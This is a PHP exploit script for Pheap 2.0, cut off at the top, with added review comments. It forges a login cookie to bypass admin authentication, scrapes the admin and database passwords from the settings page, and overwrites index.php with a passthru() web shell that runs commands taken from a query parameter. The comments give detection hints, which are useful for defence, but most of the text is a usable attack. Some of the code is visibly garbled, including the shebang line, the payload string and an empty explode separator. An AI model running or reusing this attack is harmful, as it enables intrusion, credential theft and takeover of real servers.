#!/usr/bin/php -q -d short_open_tag=on '/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
// NOTE(review): this listing is cut off at the top. The shebang line above has the
// tail of an earlier path-validation statement glued onto it, and the opening PHP
// tag, the option parsing and the sendpacketii() helper are all out of view.
// Everything below relies on globals assigned out of view: $host, $port, $path,
// $proxy, $user, $cmd, $exploit and $html (the last response body, presumably
// filled in by sendpacketii() -- confirm against the missing part of the file).
//
// What the visible requests demonstrate about the target (Pheap 2.0):
//  - The only "credential" ever sent is the header "Cookie: pheap_login=<user>".
//    No password or session token is obtained first, so the target evidently
//    accepts that client-supplied cookie as a logged-in identity.
//  - settings.php renders the admin username/password and the database
//    host/user/password inside form value="..." attributes, which this script
//    scrapes with explode().
//  - edit.php?action=update_doc is POSTed a "filename" and "content" pair; the
//    script then expects index.php to contain the posted payload, i.e. the
//    endpoint writes request-controlled content to a request-controlled file.
// Triage hints grounded in the requests below: an unexpected pheap_login cookie
// on settings.php, a POST to edit.php?action=update_doc whose body contains
// passthru/ini_set, and GET index.php?cmd=... immediately afterwards.

// $p is built here but not used by anything visible below; presumably the
// missing sendpacketii() reads it to decide between direct and proxied requests.
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

// Mode 0: fetch settings.php with the forged cookie and scrape credentials.
if ($exploit==0){
    print "-------------------------------------------------------------------------\r\n";
    print " Pheap 2.0 Admin Bypass/Remote Code Execution\r\n";
    print "-------------------------------------------------------------------------\r\n";
    $packet ="GET " . $path . "settings.php HTTP/1.1\r\n";
    $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
    $packet.="Host: ".$host."\r\n";
    // $data is not assigned anywhere visible before this point (only mode 1 sets
    // it), so this is Content-Length: 0 on a body-less GET; on PHP 8.1+ strlen(null)
    // also raises a deprecation notice.
    $packet.="Content-Length: ".strlen($data)."\r\n";
    // The forged identity: no authentication happens before this request.
    $packet.="Cookie: pheap_login=" . $user . "\r\n";
    $packet.="Connection: Close\r\n\r\n";
    sendpacketii($packet);
    // Success is detected only by a marker string in the settings page.
    if (strstr($html,"This is the settings panel")){} else{echo "...Failed!\r\n"; exit();}
    // Each value is scraped by splitting on the exact HTML around the input's
    // value attribute. If a marker is absent, $temp[1] is undefined (notice) and
    // an empty value is printed rather than an error. $ret_user is reused for
    // every field, so its name is misleading for the password/DB values.
    $temp=explode("name=\"user_name\" class=\"ieleft\" value=\"",$html);
    $temp2=explode("\" /> :Username",$temp[1]);
    $ret_user=$temp2[0];
    echo "[+] Admin User: " . $ret_user . "\r\n";
    // The admin password is rendered in cleartext by the settings form.
    $temp=explode("name=\"password\" class=\"ieleft\" value=\"",$html);
    $temp2=explode("\" /> :Password",$temp[1]);
    $ret_user=$temp2[0];
    echo "[+] Admin Pass: " . $ret_user . "\r\n";
    $temp=explode("name=\"dbhost\" class=\"ieleft\" id=\"dbhost\" value=\"",$html);
    $temp2=explode("\" /> :Database Host",$temp[1]);
    $ret_user=$temp2[0];
    echo "[+] Database Host: " . $ret_user . "\r\n";
    $temp=explode("name=\"dbuser\" class=\"ieleft\" id=\"dbuser\" value=\"",$html);
    $temp2=explode("\" /> :Database Username",$temp[1]);
    $ret_user=$temp2[0];
    echo "[+] Database User: " . $ret_user . "\r\n";
    // The database password is likewise exposed in cleartext.
    $temp=explode("name=\"dbpass\" class=\"ieleft\" id=\"dbpass\" value=\"",$html);
    $temp2=explode("\" /> :Database Password",$temp[1]);
    $ret_user=$temp2[0];
    echo "[+] Database Pass: " . $ret_user . "\r\n";
    print "-------------------------------------------------------------------------\r\n";
    print " http://www.w4ck1ng.com\r\n";
    print " ...Silentz\r\n";
    print "-------------------------------------------------------------------------\r\n";
}

// Mode 1: use the editor's save action to overwrite index.php, then call it.
if($exploit==1){
    // Step 1: open the file editor on index.php (same forged cookie) so the
    // server-side path of the file can be read back from the edit form.
    $packet ="GET " . $path . "edit.php?em=file&filename=" . $path . "index.php HTTP/1.1\r\n";
    $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
    $packet.="Host: ".$host."\r\n";
    // $data is still unassigned here (it is set a few lines further down).
    $packet.="Content-Length: ".strlen($data)."\r\n";
    $packet.="Cookie: pheap_login=" . $user . "\r\n";
    $packet.="Connection: Close\r\n\r\n";
    sendpacketii($packet);
    // The hidden "filename" field of the edit form carries the absolute path that
    // the save action expects; no validation that the marker was actually found.
    $temp=explode("name=\"filename\" value=\"",$html);
    $temp2=explode("\">",$temp[1]);
    $fullpath=$temp2[0];
    // Payload written into index.php. NOTE(review): this literal looks
    // extraction-damaged -- it begins with a stray closing quote and ends with a
    // closing PHP tag, so an opening tag and echo were probably stripped when the
    // page was scraped. As written it is not valid PHP and would be stored verbatim.
    // What remains shows the intent: echo a marker, lift the time limit, passthru()
    // the unsanitised "cmd" query parameter, echo the marker again.
    $shell = '...Silentz";ini_set("max_execution_time",0);passthru($_GET[cmd]);echo "...Silentz";?>';
    // The mce_editor_* fields appear to mimic the editor widget's form; only
    // "content" and "filename" carry the actual payload and target path.
    $data = "mce_editor_0_styleSelect=";
    $data .= "&mce_editor_0_formatSelect=";
    $data .= "&mce_editor_0_fontNameSelect=";
    $data .= "&mce_editor_0_fontSizeSelect=0";
    $data .= "&mce_editor_0_zoomSelect=100%25";
    $data .= "&content=" . urlencode($shell);
    $data .= "&filename=" . urlencode($fullpath);
    $data .= "&update_text.x=57";
    $data .= "&update_text.y=15";
    // Step 2: the save action. Nothing in this request beyond the cookie
    // identifies the caller; there is no CSRF token or second factor in the form.
    $packet ="POST " . $path . "edit.php?action=update_doc HTTP/1.1\r\n";
    $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
    $packet.="Accept: */*\r\n";
    $packet.="Host: ".$host."\r\n";
    $packet.="Content-Length: ".strlen($data)."\r\n";
    $packet.="Cookie: pheap_login=" . $user . "\r\n";
    // Referer is set to the edit page, presumably because the target checks it.
    $packet.="Referer: http://" . $host.$path . "edit.php?em=file&filename=" . $path . "index.php\r\n";
    $packet.="Connection: Close\r\n\r\n";
    $packet.=$data;
    sendpacketii($packet);
    // Step 3: request the overwritten index.php. $cmd is concatenated into the
    // request line without urlencode(), so a command containing spaces or other
    // reserved characters produces a malformed request; the response of the POST
    // above is never checked either.
    $packet ="GET " . $path . "index.php?cmd=" . $cmd . " HTTP/1.1\r\n";
    $packet.="Host: ".$host."\r\n";
    $packet.="Connection: Close\r\n\r\n";
    sendpacketii($packet);
    // Success is inferred from the marker echoed by the payload. On failure this
    // mode prints nothing at all and falls through silently.
    if (strstr($html,"...Silentz")) {
        print "-------------------------------------------------------------------------\r\n";
        print " Pheap 2.0 Admin Bypass/Remote Code Execution\r\n";
        print "-------------------------------------------------------------------------\r\n";
        // Text between the two markers is the command output.
        $temp=explode("...Silentz",$html);
        // NOTE(review): explode() with an empty separator returns false (plus a
        // warning) on PHP 5/7 and throws ValueError on PHP 8, so $temp2[0] is never
        // the output; the separator was most likely lost in extraction, like the
        // tags in $shell above. $temp[1] already holds the text between the markers.
        $temp2=explode("",$temp[1]);
        echo "===============================================================\r\n\r\n";
        echo $temp2[0];
        echo "\r\n===============================================================\r\n";
        echo "\r\n[+] Shell...http://" .$host.$path. "index.php?cmd=[COMMAND]\r\n";
        print "-------------------------------------------------------------------------\r\n";
        print " http://www.w4ck1ng.com\r\n";
        print " ...Silentz\r\n";
        print "-------------------------------------------------------------------------\r\n";
        die;
    }
}
?>